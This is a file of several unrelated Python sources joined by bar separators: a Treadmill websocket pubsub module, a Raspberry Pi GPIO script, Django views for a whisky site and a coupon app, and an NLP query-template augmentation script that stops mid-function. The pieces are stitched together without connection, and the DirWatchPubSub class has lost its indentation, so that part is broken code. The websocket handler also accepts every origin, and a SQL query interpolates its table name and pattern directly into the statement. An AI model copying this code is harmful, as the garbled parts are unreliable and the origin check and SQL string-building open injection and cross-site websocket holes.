from treadmill import utils
_LOGGER = logging.getLogger(__name__)
def make_handler(pubsub):
    """Make websocket handler factory.

    Returns a tornado ``WebSocketHandler`` subclass whose subscription
    machinery is bound to *pubsub* (a ``DirWatchPubSub``-like object
    exposing ``impl`` and ``register``).
    """
    class _WS(tornado.websocket.WebSocketHandler):
        """Websocket handler managing per-connection event subscriptions."""

        def __init__(self, application, request, **kwargs):
            """Default constructor for tornado.websocket.WebSocketHandler"""
            tornado.websocket.WebSocketHandler.__init__(
                self, application, request, **kwargs
            )
            # Correlation id included in every log line for this connection.
            self._request_id = str(uuid.uuid4())
            self._subscriptions = set()

        def active(self, sub_id=None):
            """Return true if connection (and optional subscription) is active,
            false otherwise.

            If connection is not active, so are all of its subscriptions.
            """
            if not self.ws_connection:
                return False
            return sub_id is None or sub_id in self._subscriptions

        def open(self, *args, **kwargs):
            """Called when connection is opened.

            Override if you want to do something else besides log the action.
            """
            _LOGGER.info('[%s] Connection opened, remote ip: %s',
                         self._request_id, self.request.remote_ip)

        def send_msg(self, msg):
            """Send message."""
            _LOGGER.info('[%s] Sending message: %r', self._request_id, msg)
            try:
                self.write_message(msg)
            except Exception:  # pylint: disable=W0703
                # Best effort: a failed write is logged, not re-raised.
                _LOGGER.exception('[%s] Error sending message: %r',
                                  self._request_id, msg)

        def send_error_msg(self, error_str, sub_id=None, close_conn=True):
            """Convenience method for logging and returning errors.

            If sub_id is provided, it will be included in the error message and
            subscription will be removed.

            Note: this method will close the connection after sending back the
            error, unless close_conn=False.
            """
            error_msg = {'_error': error_str,
                         'when': time.time()}
            if sub_id is not None:
                error_msg['sub-id'] = sub_id
                _LOGGER.info('[%s] Removing subscription %s',
                             self._request_id, sub_id)
                try:
                    self._subscriptions.remove(sub_id)
                except KeyError:
                    pass
            self.send_msg(error_msg)
            if close_conn:
                _LOGGER.info('[%s] Closing connection.', self._request_id)
                self.close()

        def on_close(self):
            """Called when connection is closed.

            Override if you want to do something else besides log the action.
            """
            _LOGGER.info('[%s] Connection closed.', self._request_id)

        def check_origin(self, origin):
            """Overriding check_origin method from base class.

            This method returns true all the time.
            """
            parsed_origin = urllib_parse.urlparse(origin)
            _LOGGER.debug('parsed_origin: %r', parsed_origin)
            return True

        def on_message(self, message):
            """Manage event subscriptions."""
            if not pubsub:
                _LOGGER.fatal('pubsub is not configured, ignore.')
                self.send_error_msg('Fatal: unexpected error', close_conn=True)
                # Fix: previously execution fell through and dereferenced
                # the unset pubsub below; bail out after reporting the error.
                return

            _LOGGER.info('[%s] Received message: %s',
                         self._request_id, message)
            sub_id = None
            close_conn = True
            try:
                sub_msg = json.loads(message)
                sub_id = sub_msg.get('sub-id')
                # With an explicit sub-id, errors keep the connection open.
                close_conn = sub_id is None

                if sub_msg.get('unsubscribe') is True:
                    _LOGGER.info('[%s] Unsubscribing %s',
                                 self._request_id, sub_id)
                    try:
                        self._subscriptions.remove(sub_id)
                    except KeyError:
                        self.send_error_msg(
                            'Invalid subscription: %s' % sub_id,
                            close_conn=False
                        )
                    return

                if sub_id and sub_id in self._subscriptions:
                    self.send_error_msg(
                        'Subscription already exists: %s' % sub_id,
                        close_conn=False
                    )
                    return

                topic = sub_msg.get('topic')
                impl = pubsub.impl.get(topic)
                if not impl:
                    self.send_error_msg(
                        'Invalid topic: %s' % topic,
                        sub_id=sub_id, close_conn=close_conn
                    )
                    return

                subscription = impl.subscribe(sub_msg)
                since = sub_msg.get('since', 0)
                snapshot = sub_msg.get('snapshot', False)

                if sub_id and not snapshot:
                    _LOGGER.info('[%s] Adding subscription %s',
                                 self._request_id, sub_id)
                    self._subscriptions.add(sub_id)

                for watch, pattern in subscription:
                    pubsub.register(watch, pattern, self, impl, since, sub_id)

                if snapshot and close_conn:
                    _LOGGER.info('[%s] Closing connection.', self._request_id)
                    self.close()
            except Exception as err:  # pylint: disable=W0703
                self.send_error_msg(str(err),
                                    sub_id=sub_id, close_conn=close_conn)

        def data_received(self, chunk):
            """Passthrough of abstract method data_received"""
            pass

        def on_event(self, filename, operation, _content):
            """Default event handler."""
            _LOGGER.debug('%s %s', filename, operation)
            return {'time': time.time(),
                    'filename': filename,
                    'op': operation}

    return _WS
class DirWatchPubSub(object):
"""Pubsub dirwatch events."""
def __init__(self, root, impl=None, watches=None):
self.root = os.path.realpath(root)
self.impl = impl or {}
self.watches = watches or []
self.watcher = dirwatch.DirWatcher()
self.watcher.on_created = self._on_created
self.watcher.on_deleted = self._on_deleted
self.watcher.on_modified = self._on_modified
self.watch_dirs = set()
for watch in self.watches:
watch_dirs = self._get_watch_dirs(watch)
self.watch_dirs.update(watch_dirs)
for directory in self.watch_dirs:
_LOGGER.info('Added permanent dir watcher: %s', directory)
self.watcher.add_dir(directory)
self.ws = make_handler(self)
self.handlers = collections.defaultdict(list)
def register(self, watch, pattern, ws_handler, impl, since, sub_id=None):
"""Register handler with pattern."""
watch_dirs = self._get_watch_dirs(watch)
for directory in watch_dirs:
if ((not self.handlers[directory] and
directory not in self.watch_dirs)):
_LOGGER.info('Added dir watcher: %s', directory)
self.watcher.add_dir(directory)
# Store pattern as precompiled regex.
pattern_re = re.compile(
fnmatch.translate(pattern)
)
self.handlers[directory].append(
(pattern_re, ws_handler, impl, sub_id)
)
self._sow(watch, pattern, since, ws_handler, impl, sub_id=sub_id)
def _get_watch_dirs(self, watch):
pathname = os.path.realpath(os.path.join(self.root, watch.lstrip('/')))
return [path for path in glob.glob(pathname) if os.path.isdir(path)]
@utils.exit_on_unhandled
def _on_created(self, path):
"""On file created callback."""
_LOGGER.debug('created: %s', path)
self._handle('c', path)
@utils.exit_on_unhandled
def _on_modified(self, path):
"""On file modified callback."""
_LOGGER.debug('modified: %s', path)
self._handle('m', path)
@utils.exit_on_unhandled
def _on_deleted(self, path):
"""On file deleted callback."""
_LOGGER.debug('deleted: %s', path)
self._handle('d', path)
def _handle(self, operation, path):
"""Get event data and notify interested handlers of the change."""
directory, filename = os.path.split(path)
# Ignore (.) files, as they are temporary or "system".
if filename[0] == '.':
return
directory_handlers = self.handlers.get(directory, [])
handlers = [
(handler, impl, sub_id)
for pattern_re, handler, impl, sub_id in directory_handlers
if (handler.active(sub_id=sub_id) and
pattern_re.match(filename))
]
if not handlers:
return
if operation == 'd':
when = time.time()
content = None
else:
if '/trace/' in path:
# Specialized handling of trace files (no need to stat/read).
# If file was already deleted (trace cleanup), don't ignore it.
_, timestamp, _ = filename.split(',', 2)
when, content = float(timestamp), ''
else:
try:
when = os.stat(path).st_mtime
with io.open(path) as f:
content = f.read()
except (IOError, OSError) as err:
if err.errno == errno.ENOENT:
# If file was already deleted, ignore.
# It will be handled as 'd'.
return
raise
self._notify(handlers, path, operation, content, when)
def _notify(self, handlers, path, operation, content, when):
"""Notify interested handlers of the change."""
root_len = len(self.root)
for handler, impl, sub_id in handlers:
try:
payload = impl.on_event(path[root_len:],
operation,
content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=broad-except
_LOGGER.exception('Error handling event: %s, %s, %s, %s, %s',
path, operation, content, when, sub_id)
handler.send_error_msg(
'{cls}: {err}'.format(
cls=type(err).__name__,
err=str(err)
),
sub_id=sub_id,
close_conn=sub_id is None
)
def _db_records(self, db_path, sow_table, watch, pattern, since):
    """Get matching records from db.

    Returns (connection, cursor) on success, (None, None) if the db file
    is missing or the query fails.  Caller owns (and must close) the
    returned connection.
    """
    # if file does not exist, do not try to open it. Opening connection
    # will create the file, there is no way to prevent this from
    # happening until py3.
    #
    if not os.path.exists(db_path):
        _LOGGER.info('Ignore deleted db: %s', db_path)
        return (None, None)
    # There is rare condition that the db file is deleted HERE. In this
    # case connection will be open, but the tables will not be there.
    conn = sqlite3.connect(db_path)
    # Before Python 3.7 GLOB pattern must not be parametrized to use index.
    # NOTE(review): sow_table and pattern are interpolated into the SQL
    # text; callers must pass trusted values only.
    select_stmt = """
    SELECT timestamp, path, data FROM %s
    WHERE directory GLOB ? AND name GLOB '%s' AND timestamp >= ?
    ORDER BY timestamp
    """ % (sow_table, pattern)
    # Return open connection, as conn.execute is cursor iterator, not
    # materialized list.
    try:
        return conn, conn.execute(select_stmt, (watch, since,))
    except sqlite3.OperationalError as db_err:
        # Not sure if the file needs to be deleted at this point. As
        # sow_table is a parameter, passing non-existing table can cause
        # legit file to be deleted.
        _LOGGER.info('Unable to execute: select from %s:%s ..., %s',
                     db_path, sow_table, str(db_err))
        conn.close()
        return (None, None)
def _sow(self, watch, pattern, since, handler, impl, sub_id=None):
    """Publish state of the world.

    Streams every (when, path, content) record newer than ``since`` under
    ``watch`` matching ``pattern`` to ``handler`` — merged, timestamp
    ordered, from optional sow databases plus the live filesystem — and
    skips duplicate paths (first occurrence wins).
    """
    if since is None:
        since = 0

    def _publish(item):
        # Send one (when, path, content) record; errors are reported to
        # the handler but do not abort the stream.
        when, path, content = item
        try:
            payload = impl.on_event(str(path), None, content)
            if payload is not None:
                payload['when'] = when
                if sub_id is not None:
                    payload['sub-id'] = sub_id
                handler.send_msg(payload)
        except Exception as err:  # pylint: disable=W0703
            _LOGGER.exception('Error handling sow event: %s, %s, %s, %s',
                              path, content, when, sub_id)
            handler.send_error_msg(str(err), sub_id=sub_id)

    db_connections = []
    fs_records = self._get_fs_sow(watch, pattern, since)
    # impl opts into db-backed sow via optional 'sow'/'sow_table' attrs.
    sow = getattr(impl, 'sow', None)
    sow_table = getattr(impl, 'sow_table', 'sow')
    try:
        records = []
        if sow:
            dbs = sorted(glob.glob(os.path.join(self.root, sow, '*')))
            for db in dbs:
                # Skip dot-files (temporary/in-progress databases).
                if os.path.basename(db).startswith('.'):
                    continue
                conn, db_cursor = self._db_records(
                    db, sow_table, watch, pattern, since
                )
                if db_cursor:
                    records.append(db_cursor)
                # FIXME: Figure out pylint use before assign
                #
                # pylint: disable=E0601
                if conn:
                    db_connections.append(conn)
        records.append(fs_records)
        # Merge db and fs records, removing duplicates.
        prev_path = None
        for item in heapq.merge(*records):
            _when, path, _content = item
            if path == prev_path:
                continue
            prev_path = path
            _publish(item)
    finally:
        for conn in db_connections:
            if conn:
                conn.close()
def _get_fs_sow(self, watch, pattern, since):
    """Get state of the world from filesystem.

    Returns a sorted list of (mtime, root-relative-path, content) tuples
    for files under ``watch`` matching ``pattern`` whose mtime is at or
    after ``since``.
    """
    root_len = len(self.root)
    fs_glob = os.path.join(self.root, watch.lstrip('/'), pattern)
    items = []
    for filename in glob.glob(fs_glob):
        try:
            stat = os.stat(filename)
            # Filter on mtime BEFORE reading: previously the file content
            # was read even for stale files and then thrown away.
            if stat.st_mtime < since:
                continue
            with io.open(filename) as f:
                content = f.read()
            items.append((stat.st_mtime, filename[root_len:], content))
        except (IOError, OSError) as err:
            # Ignore files deleted between glob and stat/read; they will
            # surface as 'd' events instead.
            if err.errno != errno.ENOENT:
                raise
    return sorted(items)
def _gc(self):
    """Drop handlers whose websocket subscriptions are no longer active."""
    for directory in list(six.viewkeys(self.handlers)):
        active = []
        for pattern, handler, impl, sub_id in self.handlers[directory]:
            if handler.active(sub_id=sub_id):
                active.append((pattern, handler, impl, sub_id))
        _LOGGER.info('Number of active handlers for %s: %s',
                     directory, len(active))
        if active:
            self.handlers[directory] = active
        else:
            _LOGGER.info('No active handlers for %s', directory)
            self.handlers.pop(directory, None)
            if directory not in self.watch_dirs:
                # Watch is not permanent, remove dir from watcher.
                self.watcher.remove_dir(directory)
@utils.exit_on_unhandled
def run(self, once=False):
    """Run the event loop: poll the watcher and periodically GC handlers.

    once -- when True, perform a single non-blocking pass and return.
    """
    last_gc = time.time()
    while True:
        # A single pass uses a zero timeout so it never blocks.
        wait_interval = 0 if once else 10
        if self.watcher.wait_for_events(wait_interval):
            self.watcher.process_events()
        if time.time() - last_gc >= wait_interval:
            self._gc()
            last_gc = time.time()
        if once:
            break
@utils.exit_on_unhandled
def run_detached(self):
    """Start the event loop on a daemon thread and return immediately."""
    worker = threading.Thread(target=self.run)
    # Daemonize so the thread never blocks interpreter shutdown.
    worker.daemon = True
    worker.start()
|
#!/usr/bin/env python
# Pulse BCM pin 16 low twice (two ~150ms off/on blinks), then leave it HIGH.
# NOTE(review): uses xrange, so this targets Python 2; under Python 3 it
# would need range. No GPIO.cleanup() is called — presumably intentional so
# the pin stays driven HIGH after exit; confirm.
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(16,GPIO.OUT)
for x in xrange(2):
    GPIO.output(16, GPIO.HIGH)
    time.sleep(.15)
    GPIO.output(16, GPIO.LOW)
    time.sleep(.15)
GPIO.output(16, GPIO.HIGH)
|
import json
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from django.views.generic import TemplateView, DetailView, ListView
from whiskydatabase.models import *
def distillery_list():
    """Build the context fragment listing all active distilleries."""
    active = Distillery.objects.filter(is_active=True).distinct()
    return {'distillery_list': active}
class HomeView(ListView):
    """Landing page listing whiskies."""
    model = WhiskyInfo
    template_name = "home.html"

    def get_context_data(self, **kwargs):
        # No extra context yet; kept as an extension point.
        return super().get_context_data(**kwargs)
class WhiskyListView(ListView):
    """Browsable list of all whiskies."""
    model = WhiskyInfo
    template_name = "whisky_list.html"
    context_object_name = 'whisky_list'

    def get_context_data(self, **kwargs):
        # No extra context yet; kept as an extension point.
        return super().get_context_data(**kwargs)
class DistilleryMapView(ListView):
    """Map page plotting every distillery."""
    model = Distillery
    template_name = "distillerymap.html"
    context_object_name = 'distillery_list'

    def get_context_data(self, **kwargs):
        # No extra context yet; kept as an extension point.
        return super().get_context_data(**kwargs)
class BarMapView(ListView):
    """Map page plotting every bar."""
    model = Bar
    template_name = "barmap.html"
    context_object_name = 'bar_list'

    def get_context_data(self, **kwargs):
        # No extra context yet; kept as an extension point.
        return super().get_context_data(**kwargs)
class DistilleryListView(ListView):
    """Distillery listing rendered with the home template."""
    model = Distillery
    template_name = "home.html"

    def get_context_data(self, **kwargs):
        # No extra context yet; kept as an extension point.
        return super().get_context_data(**kwargs)
class DistilleryView(DetailView):
    """Detail page for one distillery, looked up by slug."""
    template_name = "distillery.html"
    model = Distillery
    slug_url_kwarg = "distillery_slug"
    context_object_name = "distillery_detail"

    def dispatch(self, request, *args, **kwargs):
        # Resolve the object up front so all handlers share self.object.
        slug = kwargs.get("distillery_slug")
        self.object = Distillery.objects.filter(slug=slug).last()
        return super(DistilleryView, self).dispatch(request, *args, **kwargs)

    def get_context_data(self, *args, **kwargs):
        context = super(DistilleryView, self).get_context_data(*args, **kwargs)
        # Sidebar needs the full list of active distilleries.
        context.update(distillery_list())
        return context
class WhiskyView(DetailView):
    """Detail page for a single whisky.

    Handles, via POST, the page's AJAX/form actions: comment create /
    edit / delete (each maintaining the whisky's running average rating),
    wishlist bookmark toggling, and per-flavor note editing.
    """
    template_name = "whisky_info.html"
    model = WhiskyInfo
    slug_url_kwarg = "whisky_slug"
    context_object_name = "whisky_detail"

    # Flavor-profile model fields, indexed by the ctrl_id the client posts
    # ('0'..'7').  Replaces eight copy-pasted if/elif branches.
    FLAVOR_FIELDS = ('flora', 'fruity', 'creamy', 'nutty',
                     'malty', 'spicy', 'smoky', 'peaty')

    def dispatch(self, request, *args, **kwargs):
        # Resolve the whisky once so every handler can use self.object.
        slug = kwargs.get("whisky_slug")
        self.object = WhiskyInfo.objects.filter(slug=slug).last()
        return super(WhiskyView, self).dispatch(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        """Route the posted action to the matching handler."""
        if request.POST.get('comment'):
            return self._create_comment(request)
        elif request.POST.get('comment-edit'):
            return self._edit_comment(request)
        elif request.POST.get('delete_cmt_id'):
            return self._delete_comment(request)
        elif request.POST.get('action') == 'bookmark':
            return self._toggle_bookmark(request)
        elif request.POST.get('flavor_edit') == 'flavor_edit':
            return self._update_flavor(request)
        # Unknown action: fall through returning None (same as before).
        return None

    @staticmethod
    def _publish_choice(request):
        # Checkbox present -> private note; absent -> public.
        return "Private" if request.POST.get('publish_choice') else "Public"

    @staticmethod
    def _clean_rating(raw):
        """Normalize a posted rating: empty string counts as 0."""
        return raw if raw else 0

    def _create_comment(self, request):
        """Create a comment and fold its rating into the running average."""
        rating = self._clean_rating(request.POST['myRating'])
        Comment.objects.create(
            note=request.POST.get('comment'),
            user=self.request.user,
            publish_choice=self._publish_choice(request),
            whisky=self.object,
            rating=rating,
        )
        total = self.object.num_rating * self.object.rating + float(rating)
        self.object.num_rating += 1
        self.object.rating = total / self.object.num_rating
        self.object.save()
        return HttpResponseRedirect('/whisky/{}/#r'.format(self.object.slug))

    def _edit_comment(self, request):
        """Update a comment, swapping old rating for new in the average."""
        comment = Comment.objects.filter(
            id=request.POST.get('comment-id')).last()
        rating = self._clean_rating(request.POST['myRating-edit'])
        total = (self.object.num_rating * self.object.rating
                 - comment.rating + float(rating))
        comment.note = request.POST.get('comment-edit')
        comment.rating = rating
        comment.publish_choice = self._publish_choice(request)
        comment.save()
        self.object.rating = total / self.object.num_rating
        self.object.save()
        return HttpResponseRedirect('/whisky/{}/#r'.format(self.object.slug))

    def _delete_comment(self, request):
        """Delete a comment and back its rating out of the average."""
        comment = Comment.objects.filter(
            id=request.POST.get('delete_cmt_id')).last()
        total = self.object.num_rating * self.object.rating - comment.rating
        self.object.num_rating -= 1
        # Avoid dividing by zero when the last rated comment goes away.
        if self.object.num_rating == 0:
            self.object.rating = 0
        else:
            self.object.rating = total / self.object.num_rating
        self.object.save()
        comment.delete()
        return HttpResponse(True)

    def _toggle_bookmark(self, request):
        """Toggle the wishlist entry; respond 1 if now bookmarked, else 0."""
        existing = Wishlist.objects.filter(whisky=self.object,
                                           user=request.user)
        if existing.exists():
            existing.delete()
            return HttpResponse(0)
        Wishlist.objects.create(whisky=self.object, user=request.user)
        return HttpResponse(1)

    def _update_flavor(self, request):
        """Set one flavor axis on the user's personal note and fold the
        change into the crowd average, returning the new average."""
        value = int(request.POST.get('value'))
        ctrl_id = request.POST.get('ctrl_id')
        whisky = self.object
        user = self.request.user
        p_note = PersonalWhiskyNote.objects.filter(
            whisky=whisky, user=user).last()
        g_note = GeneralWhiskyNote.objects.filter(whisky=whisky).last()
        if p_note is None:
            # First flavor rating from this user for this whisky: count
            # them as a new contributor on the general note.
            p_note = PersonalWhiskyNote.objects.create(user=user,
                                                       whisky=whisky)
            if g_note is None:
                g_note = GeneralWhiskyNote.objects.create(
                    whisky=whisky, total_notes_num=1)
            else:
                g_note.total_notes_num += 1
            g_note.save()
        # Exact-string lookup so unknown ctrl_ids still return 0 as before.
        flavor_by_id = {str(i): name
                        for i, name in enumerate(self.FLAVOR_FIELDS)}
        field = flavor_by_id.get(ctrl_id)
        new_avg = 0
        if field is not None:
            total = g_note.total_notes_num
            crowd = getattr(g_note, field)
            mine = getattr(p_note, field)
            if mine is None:
                # First score on this axis from this user: the previous
                # average covered total-1 contributors.
                new_avg = (crowd * (total - 1) + value) / total
            else:
                # Re-score: replace this user's old value in the sum.
                new_avg = (crowd * total - mine + value) / total
            setattr(g_note, field, new_avg)
            setattr(p_note, field, value)
        p_note.save()
        g_note.save()
        return HttpResponse(new_avg)

    def get_context_data(self, *args, **kwargs):
        context = super(WhiskyView, self).get_context_data(*args, **kwargs)
        comments = Comment.objects.filter(
            whisky_id=self.object.id,
            publish_choice="Public").order_by('created_at')
        my_comment = None
        personal_note = None
        personal_note_array = [0] * 8
        general_note_array = [0] * 8
        if not self.request.user.is_anonymous:
            # BUG FIX: previously `self.request.user == 'AnoymousUser'`
            # compared a user object to a (misspelled) string — never true,
            # so the user's own comment was never loaded.
            my_comment = Comment.objects.filter(
                whisky_id=self.object.id, user=self.request.user).last()
            personal_note = PersonalWhiskyNote.objects.filter(
                whisky=self.object, user=self.request.user).last()
            if personal_note:
                personal_note_array = [getattr(personal_note, f)
                                       for f in self.FLAVOR_FIELDS]
        general_note = GeneralWhiskyNote.objects.filter(
            whisky=self.object).last()
        if general_note:
            general_note_array = [getattr(general_note, f)
                                  for f in self.FLAVOR_FIELDS]
        context.update({
            "comments": comments,
            "my_comment": my_comment,
            "general_note_array": json.dumps(list(general_note_array)),
            "personal_note_array": json.dumps(list(personal_note_array)),
            'bm_boolean': 1 if Wishlist.objects.filter(
                whisky=self.object,
                user_id=self.request.user.id).exists() else 0,
            "personal_note": personal_note,
        })
        context.update(distillery_list())
        return context
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from django.utils import timezone
from .models import Coupon, Claim
from accounts.models import Person
class IndexView(generic.ListView):
    """Front page: the five most recently published coupons."""
    template_name = 'coupons/index.html'
    context_object_name = 'latest_coupon_list'

    def get_queryset(self):
        """Return the last five published coupons."""
        published = Coupon.objects.filter(publish_date__lte=timezone.now())
        return published.order_by('-publish_date')[:5]
class DetailView(generic.DetailView):
    """Coupon detail; hides coupons whose publish date is in the future."""
    model = Coupon
    template_name = 'coupons/detail.html'

    def get_queryset(self):
        # Only coupons already published are visible.
        return Coupon.objects.filter(publish_date__lte=timezone.now())
class ResultsView(generic.DetailView):
    """Results page for a single coupon."""
    model = Coupon
    template_name = 'coupons/results.html'
def claim(request, coupon_id):
    """Claim a coupon for the logged-in user.

    Re-renders the detail page with an error when the user is anonymous
    or already claimed this coupon; otherwise records the claim and
    redirects to the index (POST/redirect/GET, so Back can't resubmit).
    """
    coupon = get_object_or_404(Coupon, pk=coupon_id)
    # NOTE: is_authenticated is called here (Django < 1.10 style, matching
    # the django.core.urlresolvers import above).
    if not request.user.is_authenticated():
        return render(request, 'coupons/detail.html', {
            'coupon': coupon,
            'error_message': "You need to be logged in to claim.",
        })
    user = Person.objects.get(pk=request.user.id)
    if Claim.objects.filter(user=user, coupon=coupon).exists():
        # Redisplay the coupon detail form.
        return render(request, 'coupons/detail.html', {
            'coupon': coupon,
            'error_message': "You have already claimed this coupon.",
        })
    # Previously the result was bound to a local `claim`, shadowing this
    # function's own name and never used — just create the record.
    Claim.objects.create(coupon=coupon, user=user)
    return HttpResponseRedirect(reverse('coupons:index'))
|
import os,sys,inspect
import random
import numpy as np
import copy
import tagger as tg
import tag_utils as tu
from nltk.parse import stanford
from nltk import tree
# Logical-form templates.  <field>:N and <value>:N are slots filled during
# augmentation; the :N index ties a slot to the matching slot in the
# natural-language query template.
lo2count = 'count ( <field>:0 )'
lo2avg = 'avg ( <field>:0 )'
lo4max_1 = 'max ( <field>:0 )'
# lo4min_1 = 'min ( <field>:0 )'
lo4max = '<field>:0 where ( <field>:1 equal max ( <field>:1 ) )'
lo4maxb = '<field>:1 where ( <field>:0 equal max ( <field>:0 ) )'
# lo4min = '<field>:0 where ( <field>:1 equal min ( <field>:1 ) )'
lo5maxcnt = '<field>:0 argmax ( count ( <field>:1 ) )'
# lo5mincnt = '<field>:0 argmin ( count ( <field>:1 ) )'
lo6selecteq = '<field>:0 where ( <field>:1 equal <value>:1 )'
lo6selecteqb = '<field>:1 where ( <field>:0 equal <value>:0 )'
lo6selectneq = '<field>:0 where ( <field>:1 neq <value>:1 )'
lo6selectl = '<field>:0 where ( <field>:1 less <value>:1 )'
# 'ng' = "not greater" (<=); 'nl' = "not less" (>=) per expandDatasets.
lo6selectng = '<field>:0 where ( <field>:1 ng <value>:1 )'
lo7selectcnteq = '<field>:0 where ( count ( <field>:1 ) equal <count> )'
lo7selectcntl = '<field>:0 where ( count ( <field>:1 ) less <count> )'
lo7selectcntng = '<field>:0 where ( count ( <field>:1 ) ng <count> )'
lo7selectcntneq = '<field>:0 where ( count ( <field>:1 ) neq <count> )'
lo8between = '<field>:0 where ( <field>:1 between <value>:1 and <value>:1 )'
lo10select = '<field>:0 where ( ( <field>:1 equal <value>:1 ) and ( <field>:2 equal <value>:2 ) )'
lo10selector = '<field>:0 where ( ( <field>:1 equal <value>:1 ) or ( <field>:1 equal <value>:1 ) )'
lo10selectorb = '<field>:1 where ( ( <field>:0 equal <value>:0 ) or ( <field>:0 equal <value>:0 ) )'
lo10selector1 = '<field>:0 where ( ( <field>:0 equal <value>:0 ) or ( <field>:0 equal <value>:0 ) )'
lo10select102 = '<field>:1 where ( ( <field>:0 equal <value>:0 ) and ( <field>:2 equal <value>:2 ) )'
lo10select201 = '<field>:2 where ( ( <field>:0 equal <value>:0 ) and ( <field>:1 equal <value>:1 ) )'
lo11nestmulti = '<field>:0 where ( <field>:1 equal ( select ( <field>:2 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestmultil = '<field>:0 where ( <field>:1 less ( select ( <field>:2 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestmulting = '<field>:0 where ( <field>:1 ng ( select ( <field>:2 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestmulti021 = '<field>:0 where ( <field>:2 equal ( select ( <field>:2 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestmulti012 = '<field>:0 where ( <field>:1 equal ( select ( <field>:1 where ( <field>:2 equal <value>:2 ) ) ) )'
lo11nestfront = '<field>:0 where ( <field>:1 equal ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestfrontl = '<field>:0 where ( <field>:1 less ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestfrontng = '<field>:0 where ( <field>:1 ng ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
# NOTE(review): despite the "neq" name, this template uses the ' ng '
# operator and is identical to lo11nestfrontng above — confirm intended.
lo11nestfrontneq = '<field>:0 where ( <field>:1 ng ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestneq = '<field>:0 where ( <field>:0 equal ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestback = '<field>:1 where ( <field>:0 equal ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
# NOTE(review): lo11nestbackng is byte-identical to lo11nestback (uses
# 'equal', not ' ng ') — possibly a copy/paste slip; verify.
lo11nestbackng = '<field>:1 where ( <field>:0 equal ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestbackneq = '<field>:1 where ( <field>:0 neq ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
def isRepetitive(sequence):
    """Return True if the last element of sequence occurs earlier in it."""
    if not sequence:
        return False
    return sequence[-1] in sequence[:-1]
def generateFieldCombs(field_corr_dicts):
    ''' If only fields are recombinable'''
    # Recursively enumerate sequences picking one key per dict, dropping
    # any sequence whose newly added key repeats an earlier one.
    if len(field_corr_dicts) == 1:
        # Base case: one single-element sequence per key of the sole dict.
        return [[key] for key in field_corr_dicts[0].keys()]
    combos = []
    prefixes = generateFieldCombs(field_corr_dicts[:-1])
    for key in field_corr_dicts[-1].keys():
        for prefix in prefixes:
            candidate = prefix + [key]
            if candidate[-1] not in candidate[:-1]:
                combos.append(candidate)
    return combos
def generateValueCombs(field_corr_dicts, field_combination, qu_value):
    ''' Both fields and values are recombinable
    arguments --- field_combination: the selected field combination, where the value are to be decided
    '''
    # Each qu_value entry is (query_position, dict_index); candidate values
    # come from the chosen field of the dict at that index.
    _, idx = qu_value[-1]
    candidates = field_corr_dicts[idx][field_combination[idx]]
    if len(qu_value) == 1:
        # Base case: one single-element sequence per candidate value.
        return [[value] for value in candidates]
    combos = []
    prefixes = generateValueCombs(field_corr_dicts, field_combination,
                                  qu_value[:-1])
    for value in candidates:
        for prefix in prefixes:
            candidate = prefix + [value]
            # Drop sequences whose new value repeats an earlier one.
            if candidate[-1] not in candidate[:-1]:
                combos.append(candidate)
    return combos
def augment(field2word, quTemp, loTemp, field_corr, schema_aug):
    ''' Data augmentation from a pair of query template and logical template
    arguments --- field_corr: a list of value_types e.g. ['string','entity','int','bool','date'], each idx should
    correspond to the postion in the templates
    schema_aug: (self) PLURALS HERE! several schemas that the template could augment to.
    return --- collections of queries, logics, and fields
    '''
    queryCollect, logicCollect, fieldCollect = [], [], []
    # Step 1: preparation
    # Locate the <field>:N / <value>:N slots in both templates.
    print '* step: 1 *'
    print quTemp
    query = quTemp.split()
    logic = loTemp.split()
    qu_field = [] # positions of field in query
    qu_value = [] # positions of value in query
    lo_field = [] # positions of field in logic
    lo_value = [] # positions of value in logic
    for i in range(len(query)):
        reference = query[i].split(':')
        if len(reference) == 1:
            # Plain token, not a slot.
            continue
        print reference
        idx = int(reference[1])
        if reference[0] == '<field>':
            qu_field.append((i, idx))
        elif reference[0] == '<value>':
            qu_value.append((i, idx))
    print qu_field, qu_value
    for i in range(len(logic)):
        reference = logic[i].split(':')
        if len(reference) == 1:
            continue
        print reference
        idx = int(reference[1])
        if reference[0] == '<field>':
            lo_field.append((i, idx))
        elif reference[0] == '<value>':
            lo_value.append((i, idx))
    print lo_field, lo_value
    # Step 2: augment to different schemas
    print '* step: 2 *'
    for j in range(len(schema_aug)):
        # Step 2.1: for each schema, build correspondence list of dictionarys: [{}, {}, {}]
        field_corr_dicts = []
        # print '=== %d schema ===' %j
        schema = schema_aug[j]
        # because there could be multiple same-type fields in one sentences, we go over field_corr
        for k in range(len(field_corr)):
            field_corr_dict = dict()
            for i in range(len(schema)):
                field = schema[i]
                #print field
                value_type = field2word[schema[i]]['value_type']
                if value_type == field_corr[k]:
                    # Candidate fill-in values: sample up to 3 from the
                    # field's value range, or use a fixed pool for
                    # numeric/date/time types.
                    if value_type == 'entity':
                        #field_corr_dict[field] = config.field2word[schema[i]]['value_range']
                        num_sample = 3
                        if len(field2word[schema[i]]['value_range']) < num_sample:
                            num_sample = len(field2word[schema[i]]['value_range'])
                        field_corr_dict[field] = random.sample(field2word[schema[i]]['value_range'], num_sample)
                    elif value_type == 'string':
